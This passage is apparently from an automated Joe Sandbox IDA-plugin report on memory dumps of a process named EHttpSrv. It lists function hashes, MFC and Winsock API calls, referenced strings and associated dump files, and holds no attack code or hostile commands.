                                                                                                                • Opcode ID: b1147bb1563f37cf7285035b7fd7db4f8b55f7d2235472b3e4c9c79b311805a9
                                                                                                                • Instruction ID: a811e24446e8cac0382d96524549a7915c51330605ecd9f09f3ceb3af9ebd86a
                                                                                                                • Opcode Fuzzy Hash: b1147bb1563f37cf7285035b7fd7db4f8b55f7d2235472b3e4c9c79b311805a9
                                                                                                                • Instruction Fuzzy Hash: C2E180B15083419FD714DF54CC88AABB7E9FF88705F00892DF98597291EB78E908DB92
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,20462D02), ref: 204127D9
                                                                                                                • #764.MFC80U(?,?,20462D02), ref: 204127EA
                                                                                                                • #764.MFC80U(?,?,20462D02), ref: 204127FB
                                                                                                                • #764.MFC80U(?,?,20462D02), ref: 2041280C
                                                                                                                • #764.MFC80U(?,?,?), ref: 204128D9
                                                                                                                • #764.MFC80U(?,?,?), ref: 204128EA
                                                                                                                • #764.MFC80U(?,?,?), ref: 204128FB
                                                                                                                • #764.MFC80U(?,?,?), ref: 20412910
                                                                                                                • #1176.MFC80U ref: 2041291D
                                                                                                                  • Part of subcall function 20402000: wcscpy_s.MSVCR80 ref: 20402038
                                                                                                                  • Part of subcall function 20402000: wcsncpy_s.MSVCR80 ref: 20402049
                                                                                                                  • Part of subcall function 20411460: #764.MFC80U(2040FAB2,OPTNAME,?,2041266B,?,?,?,?,?,?,?,?,?,00000000), ref: 2041146E
                                                                                                                  • Part of subcall function 20411460: #265.MFC80U(00000000,OPTNAME,?,2041266B,?,?,?,?,?,?,?,?,?,00000000), ref: 204114A9
                                                                                                                  • Part of subcall function 204115E0: #764.MFC80U(?,GROUP,?,2041268F,?,?,?,?,?,?,?,?,?,?,00000000), ref: 204115EE
                                                                                                                  • Part of subcall function 204115E0: #265.MFC80U(00000000,GROUP,?,2041268F,?,?,?,?,?,?,?,?,?,?,00000000), ref: 20411629
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#265$#1176wcscpy_swcsncpy_s
                                                                                                                • String ID: DESC$GROUP$HIDDEN$OPTION$OPTIONS$OPTNAME$RULES$SETTINGS$TYPE$VALUE$ZONES
                                                                                                                • API String ID: 3313864260-3008686698
                                                                                                                • Opcode ID: 98939082490f85a1252ed007cb1178642c6058a1864723474fc795d27a62f70c
                                                                                                                • Instruction ID: cb406057bfc46c322035887182083016b808ff50fb98b63f0dd9d78b873e5502
                                                                                                                • Opcode Fuzzy Hash: 98939082490f85a1252ed007cb1178642c6058a1864723474fc795d27a62f70c
                                                                                                                • Instruction Fuzzy Hash: 3FC1B2B16043409BD710DBA4C981B4BF7E8AF94A48F00C92DFD89D7351E639EA95CB93
                                                                                                                APIs
                                                                                                                • #310.MFC80U(?,FEEA6C22,?,?,00000001,FEEA6C22), ref: 2044757B
                                                                                                                • #4026.MFC80U(000000B8,?,00000001,FEEA6C22), ref: 2044758D
                                                                                                                  • Part of subcall function 20426370: #416.MFC80U(?,?,?,?,000000B8,FEEA6C22,?,?,?), ref: 20426431
                                                                                                                  • Part of subcall function 20426370: #762.MFC80U(00000120,?,?,?,?,000000B8,FEEA6C22,?,?,?), ref: 20426474
                                                                                                                  • Part of subcall function 20426370: #977.MFC80U(?), ref: 204264C2
                                                                                                                  • Part of subcall function 20426370: #977.MFC80U(?,?), ref: 204264CA
                                                                                                                  • Part of subcall function 20426370: #977.MFC80U(?,?,?), ref: 204264D8
                                                                                                                • socket.WS2_32(00000017,00000001,00000006), ref: 204475B6
                                                                                                                • closesocket.WS2_32(00000000), ref: 204475C2
                                                                                                                  • Part of subcall function 20416820: #764.MFC80U(C483FFFF,NAME,?,2041A524,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 20416833
                                                                                                                  • Part of subcall function 20416820: #265.MFC80U(00000000,?,NAME,?,2041A524,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 2041688A
                                                                                                                  • Part of subcall function 20417B70: #764.MFC80U(?,76945540,2044727B), ref: 20417B7E
                                                                                                                  • Part of subcall function 20417B70: #764.MFC80U(?,76945540,2044727B), ref: 20417BA3
                                                                                                                • #2461.MFC80U(00000000), ref: 2044761E
                                                                                                                • #5524.MFC80U(0000005C), ref: 20447635
                                                                                                                • #310.MFC80U ref: 20447640
                                                                                                                • #5558.MFC80U(?,-00000001), ref: 2044765E
                                                                                                                • #2310.MFC80U(?,0000011C), ref: 20447674
                                                                                                                • #578.MFC80U(?,?,00000001,FEEA6C22), ref: 20447687
                                                                                                                • #3990.MFC80U(?,000000FF,?,?,00000001,FEEA6C22), ref: 204476A9
                                                                                                                • #774.MFC80U(00000000,?,?,00000001,FEEA6C22), ref: 204476B7
                                                                                                                • #578.MFC80U(?,?,00000001,FEEA6C22), ref: 204476C7
                                                                                                                • #578.MFC80U(?,?,?,00000001,FEEA6C22), ref: 204476E3
                                                                                                                • #764.MFC80U(?,FEEA6C22), ref: 20447733
                                                                                                                • #764.MFC80U(?,FEEA6C22), ref: 20447758
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?), ref: 204478D9
                                                                                                                • #578.MFC80U(00000000,?,?,?), ref: 20447913
                                                                                                                • #578.MFC80U(?,?), ref: 20447949
                                                                                                                  • Part of subcall function 20416AE0: #1176.MFC80U(?,?,20447806,?), ref: 20416AF4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578#764$#977$#310$#1176#2310#2461#265#3990#4026#416#5524#5558#762#774CriticalEnterSectionclosesocketsocket
                                                                                                                • String ID: xXH
                                                                                                                • API String ID: 2808855026-4004433314
                                                                                                                • Opcode ID: be78bb7b9a857b3a1417f9c2a055df57425b8afb2c5c391a166f3f04f36433a0
                                                                                                                • Instruction ID: 06c91e4a488b285b61ffe3b64dbe23a10200509f49b006a6806328fc123c4a12
                                                                                                                • Opcode Fuzzy Hash: be78bb7b9a857b3a1417f9c2a055df57425b8afb2c5c391a166f3f04f36433a0
                                                                                                                • Instruction Fuzzy Hash: 63D1C171900288DFDB20DFA4CD85BEE77B5AF50704F108169EC0AAB291DB786F46DB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20439510: #314.MFC80U(00000000,FEEA6C22), ref: 20439547
                                                                                                                  • Part of subcall function 20439510: #6751.MFC80U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,2047DED8), ref: 20439588
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 20442452
                                                                                                                  • Part of subcall function 2042E670: #6751.MFC80U(00000000,?,2042E5B8,00000000,FEEA6C22), ref: 2042E688
                                                                                                                • EnterCriticalSection.KERNEL32(?,FEEA6C22), ref: 2044253B
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 2044254A
                                                                                                                • #310.MFC80U ref: 20442703
                                                                                                                • #310.MFC80U ref: 20442718
                                                                                                                • #310.MFC80U ref: 2044272A
                                                                                                                • #314.MFC80U(00000000), ref: 20442742
                                                                                                                • #4026.MFC80U(00000101,00000000), ref: 20442758
                                                                                                                • #4026.MFC80U(00000123), ref: 20442767
                                                                                                                • #4026.MFC80U(00000214), ref: 20442776
                                                                                                                • #578.MFC80U ref: 204427B9
                                                                                                                • #578.MFC80U ref: 204427CB
                                                                                                                • #578.MFC80U ref: 204427E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#314#4026#578$#6751CriticalSection$EnterLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 1393448212-0
                                                                                                                • Opcode ID: a06811e997a4cc11b27affd7d612fee91356a553c5247e14fad2327ef2611812
                                                                                                                • Instruction ID: e2d4fec908829ee6fa6f350fe3cd3d5545ec75d492f97970bbd7c4ea08f16d57
                                                                                                                • Opcode Fuzzy Hash: a06811e997a4cc11b27affd7d612fee91356a553c5247e14fad2327ef2611812
                                                                                                                • Instruction Fuzzy Hash: B3E1E17260C3408FD320DF68D8C579AF7E0FBA4715F508A2EE985873A0DB399944CB92
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204154F4
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415507
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 2041551A
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 2041552A
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415546
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415568
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415581
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 2041559D
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204155BF
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204155D8
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204155F4
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415619
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 2041563E
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415672
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415694
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204156B6
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204156D8
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204156FA
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415716
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415732
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 2041574E
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415769
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415788
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: fb2261f334a4a593381616409003b7e7e79ccf1b339d4001bd330d7b823fe08f
                                                                                                                • Instruction ID: 3603d576dc4a89bf409d8259811608ecf062b6af5d605e23716ffd047f693520
                                                                                                                • Opcode Fuzzy Hash: fb2261f334a4a593381616409003b7e7e79ccf1b339d4001bd330d7b823fe08f
                                                                                                                • Instruction Fuzzy Hash: 1781C7F1900B90DBD721DFA988C1B97FBE5BB14204F908D2DE19EC7650D739E9488B92
                                                                                                                APIs
                                                                                                                • #6232.MFC80U(00000001,?,?,204577D1,00000000), ref: 20457906
                                                                                                                • #2651.MFC80U(00000429,?,00000001,?,?,204577D1,00000000), ref: 2045791B
                                                                                                                • #2155.MFC80U(00000429,?,00000001,?,?,204577D1,00000000), ref: 20457922
                                                                                                                • #2651.MFC80U(00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 20457937
                                                                                                                • #2155.MFC80U(00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 2045793E
                                                                                                                • #2651.MFC80U(0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 2045796E
                                                                                                                • #2155.MFC80U(0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 20457975
                                                                                                                • #2651.MFC80U(00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 204579A5
                                                                                                                • #2155.MFC80U(00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 204579AC
                                                                                                                • #2651.MFC80U(0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 204579D8
                                                                                                                • #2155.MFC80U(0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 204579DF
                                                                                                                • #2651.MFC80U(000004F8,00000000,0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1), ref: 20457A08
                                                                                                                • #2155.MFC80U(000004F8,00000000,0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1), ref: 20457A0F
                                                                                                                • #2651.MFC80U(000004F4,00000000,000004F8,00000000,0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001), ref: 20457A38
                                                                                                                • #2155.MFC80U(000004F4,00000000,000004F8,00000000,0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001), ref: 20457A3F
                                                                                                                • #2651.MFC80U(000004F5,00000000,000004F4,00000000,000004F8,00000000,0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429), ref: 20457A68
                                                                                                                • #2155.MFC80U(000004F5,00000000,000004F4,00000000,000004F8,00000000,0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429), ref: 20457A6F
                                                                                                                • #2651.MFC80U(000004F6,00000000), ref: 20457AA7
                                                                                                                • #2155.MFC80U(000004F6,00000000), ref: 20457AAE
                                                                                                                • #2651.MFC80U(0000040B,00000000), ref: 20457AE9
                                                                                                                • #2155.MFC80U(0000040B,00000000), ref: 20457AF0
                                                                                                                • #2651.MFC80U(00001772,00000000,0000040B,00000000), ref: 20457B2B
                                                                                                                • #2155.MFC80U(00001772,00000000,0000040B,00000000), ref: 20457B32
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651$#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 793604035-0
                                                                                                                • Opcode ID: 7b131bb64eadba3e5fa5159a75593343cac0b0a380c6cea5956b75b585b271ca
                                                                                                                • Instruction ID: 31a62825f2c348fbaeb05f40bdc2f9674bc9d37cbd3f08f150b7f628851502f9
                                                                                                                • Opcode Fuzzy Hash: 7b131bb64eadba3e5fa5159a75593343cac0b0a380c6cea5956b75b585b271ca
                                                                                                                • Instruction Fuzzy Hash: 32512970344600CFEB2687A49805FFE36E5EB62B44F40C57DA6468B6E1DBBC9E86C711
                                                                                                                APIs
                                                                                                                • #6232.MFC80U(00000001,?,?,20458B01,00000000), ref: 20458C36
                                                                                                                • #2651.MFC80U(00000429,?,00000001,?,?,20458B01,00000000), ref: 20458C4B
                                                                                                                • #2155.MFC80U(00000429,?,00000001,?,?,20458B01,00000000), ref: 20458C52
                                                                                                                • #2651.MFC80U(00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458C67
                                                                                                                • #2155.MFC80U(00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458C6E
                                                                                                                • #2651.MFC80U(00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458C98
                                                                                                                • #2155.MFC80U(00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458C9F
                                                                                                                • #2651.MFC80U(0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458CCF
                                                                                                                • #2155.MFC80U(0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458CD6
                                                                                                                • #2651.MFC80U(0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458D02
                                                                                                                • #2155.MFC80U(0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458D09
                                                                                                                • #2651.MFC80U(000004F7,00000000,0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01), ref: 20458D32
                                                                                                                • #2155.MFC80U(000004F7,00000000,0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01), ref: 20458D39
                                                                                                                • #2651.MFC80U(000004F1,00000000,000004F7,00000000,0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001), ref: 20458D62
                                                                                                                • #2155.MFC80U(000004F1,00000000,000004F7,00000000,0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001), ref: 20458D69
                                                                                                                • #2651.MFC80U(000004F2,00000000,000004F1,00000000,000004F7,00000000,0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429), ref: 20458D92
                                                                                                                • #2155.MFC80U(000004F2,00000000,000004F1,00000000,000004F7,00000000,0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429), ref: 20458D99
                                                                                                                • #2651.MFC80U(000004F3,00000000), ref: 20458DD1
                                                                                                                • #2155.MFC80U(000004F3,00000000), ref: 20458DD8
                                                                                                                • #2651.MFC80U(0000040B,00000000), ref: 20458E13
                                                                                                                • #2155.MFC80U(0000040B,00000000), ref: 20458E1A
                                                                                                                • #2651.MFC80U(00001772,00000000,0000040B,00000000), ref: 20458E55
                                                                                                                • #2155.MFC80U(00001772,00000000,0000040B,00000000), ref: 20458E5C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651$#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 793604035-0
                                                                                                                • Opcode ID: bb6037c50241223fbd7e8c3347ad34d8d324fba55ace37c8542ed0f19dfd06de
                                                                                                                • Instruction ID: 949a63b86c2facbe1e4c267be29fcaf67d256d5a06d32d8d12ce164099b2909d
                                                                                                                • Opcode Fuzzy Hash: bb6037c50241223fbd7e8c3347ad34d8d324fba55ace37c8542ed0f19dfd06de
                                                                                                                • Instruction Fuzzy Hash: AF511D30340600CBEA1687A48816BFA36F5EB71B04F40C57DE6469BAE0DFBC5D8AC751
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22,76945540,?), ref: 20440B41
                                                                                                                • #6232.MFC80U(00000001), ref: 20440B52
                                                                                                                • #2651.MFC80U(00000481,00000000,00000001), ref: 20440B85
                                                                                                                • #2155.MFC80U(00000481,00000000,00000001), ref: 20440B8C
                                                                                                                • #2651.MFC80U(000003EF,00000000,00000481,00000000,00000001), ref: 20440BBB
                                                                                                                • #2155.MFC80U(000003EF,00000000,00000481,00000000,00000001), ref: 20440BC2
                                                                                                                • #2651.MFC80U(00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440BCF
                                                                                                                • #2155.MFC80U(00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440BD6
                                                                                                                • #2651.MFC80U(00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440BF9
                                                                                                                • #2155.MFC80U(00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C00
                                                                                                                • #2651.MFC80U(00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C23
                                                                                                                • #2155.MFC80U(00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C2A
                                                                                                                • #2651.MFC80U(0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C56
                                                                                                                • #2155.MFC80U(0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C5D
                                                                                                                • #2651.MFC80U(00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C80
                                                                                                                • #2155.MFC80U(00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C87
                                                                                                                • #2651.MFC80U(0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000), ref: 20440CB3
                                                                                                                • #2155.MFC80U(0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000), ref: 20440CBA
                                                                                                                • #2651.MFC80U(00000493,?,0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000), ref: 20440CC7
                                                                                                                • #2155.MFC80U(00000493,?,0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000), ref: 20440CCE
                                                                                                                • #2651.MFC80U(00000488,?,00000493,?,0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?), ref: 20440CDB
                                                                                                                • #2155.MFC80U(00000488,?,00000493,?,0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?), ref: 20440CE2
                                                                                                                • #6751.MFC80U(00000000,?,00000488,?,00000493,?,0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000), ref: 20440D0C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651$#314#6232#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 4250440665-0
                                                                                                                • Opcode ID: 1d070f6378b8014c016d1c576663556e4a03c37731633ca55db6d18dc55688bf
                                                                                                                • Instruction ID: 7ccf6fe6ad885201f560ca1b0cb57e30665e492daf65b9dd9f5484799068d034
                                                                                                                • Opcode Fuzzy Hash: 1d070f6378b8014c016d1c576663556e4a03c37731633ca55db6d18dc55688bf
